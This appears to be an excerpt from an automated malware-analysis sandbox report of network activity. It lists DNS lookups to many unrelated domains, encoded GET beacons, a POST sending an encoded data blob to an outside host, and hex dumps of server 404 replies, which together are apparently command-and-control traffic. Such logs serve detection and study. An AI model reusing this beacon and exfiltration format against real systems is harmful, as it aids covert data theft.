          Source: global trafficHTTP traffic detected: GET /99um/?f6SpQ=_n84nZ4HGta&Sh=sejrBqbnhxLzIpZobXocfoJh7+Ax68vpI3pksmQcQlCqcURGXTbbLy2S/SU0nQLTr9eIuSCZyPnks+fy4cbgfRvRA7W8zuFue70e+ik0nvs8B1GRgQpORnQ= HTTP/1.1Host: www.yourtech-agency.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficHTTP traffic detected: GET /qyz6/?Sh=cO/WbHS7dDlPjWOw24pePOdtBvzI7qrstwS5E88tqn3GEGw6O6zMXAiSEd+QRtw+ArL2+ZdGEPoP/wr/W49OxjdcbcDVqf77kjZAc/w1Hn9qnxIMaTPUER4=&f6SpQ=_n84nZ4HGta HTTP/1.1Host: www.mybodyradar.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficHTTP traffic detected: GET /uj7x/?f6SpQ=_n84nZ4HGta&Sh=8o7PCltX/VPHe/nsrm2GraoW3Ln6cTBZ+TiwGxPZp0XU3O8CthtWROn8w6ZbnbkTCMdEyZnAfiGuFPjlC9agdmB/YOAJ3uSjrm6gafSyJ19b8vSngBVuvZk= HTTP/1.1Host: www.zt555.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficDNS traffic detected: DNS query: www.sacidasorte.com
          Source: global trafficDNS traffic detected: DNS query: www.yosoyemy.com
          Source: global trafficDNS traffic detected: DNS query: www.go2super.app
          Source: global trafficDNS traffic detected: DNS query: www.corverd.store
          Source: global trafficDNS traffic detected: DNS query: www.66hc7.com
          Source: global trafficDNS traffic detected: DNS query: www.beescy.xyz
          Source: global trafficDNS traffic detected: DNS query: www.personalcaresale.shop
          Source: global trafficDNS traffic detected: DNS query: www.ainude2.cloud
          Source: global trafficDNS traffic detected: DNS query: www.yourtech-agency.com
          Source: global trafficDNS traffic detected: DNS query: www.mybodyradar.net
          Source: global trafficDNS traffic detected: DNS query: www.zt555.shop
          Source: global trafficDNS traffic detected: DNS query: www.tigun.top
          Source: unknownHTTP traffic detected: POST /o1rp/ HTTP/1.1Host: www.yosoyemy.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.yosoyemy.comCache-Control: max-age=0Content-Length: 199Content-Type: application/x-www-form-urlencodedConnection: closeReferer: http://www.yosoyemy.com/o1rp/User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42Data Raw: 53 68 3d 65 44 45 78 2b 53 6a 57 2f 35 38 61 6a 32 31 61 68 31 59 68 2f 31 73 2f 41 67 67 46 5a 71 48 51 64 6c 6e 36 41 2b 4b 43 5a 6f 37 79 70 32 76 74 6b 6a 4c 38 74 69 50 50 53 2b 53 47 51 4b 70 70 51 68 6d 7a 51 6c 6f 2f 6c 4e 52 51 35 7a 4e 77 41 6d 74 49 6d 47 4e 63 6c 36 38 77 2b 5a 73 37 66 77 38 42 36 5a 72 54 2f 32 49 31 5a 4c 65 75 44 30 52 79 6a 41 67 71 7a 6e 6d 7a 6b 4c 44 7a 49 49 51 42 43 51 70 69 6f 41 34 57 46 6d 35 4d 4e 57 49 2b 79 37 4a 42 37 6b 34 33 44 6f 37 47 69 4f 61 57 42 76 46 43 6c 6e 48 4b 56 62 77 51 38 31 56 32 2f 4f 73 75 6c 73 63 71 41 68 38 54 6e 51 3d 3d Data Ascii: Sh=eDEx+SjW/58aj21ah1Yh/1s/AggFZqHQdln6A+KCZo7yp2vtkjL8tiPPS+SGQKppQhmzQlo/lNRQ5zNwAmtImGNcl68w+Zs7fw8B6ZrT/2I1ZLeuD0RyjAgqznmzkLDzIIQBCQpioA4WFm5MNWI+y7JB7k43Do7GiOaWBvFClnHKVbwQ81V2/OsulscqAh8TnQ==
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:46:49 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 6e 7a 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nzp/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:46:52 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 6e 7a 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nzp/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:46:54 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 6e 7a 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nzp/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:46:57 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 6e 7a 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nzp/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:47:17 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:47:19 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:47:22 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:47:24 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:47:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SrkouYgbFSvjyNm4ghpwvDtClIQMVGiqnIP4Ibf3zogZf0fJFZ6Ld8ghu4yZ4HZMDw7An2%2BeK7Lal2ZIyGQCHGbj%2BFN2QZZTeYrZTgE4SYTlc8MLLHkxc4dDV6wYHd%2FnIoQgJn%2B7fvYmdjhe"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d06b827aa7242c0-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
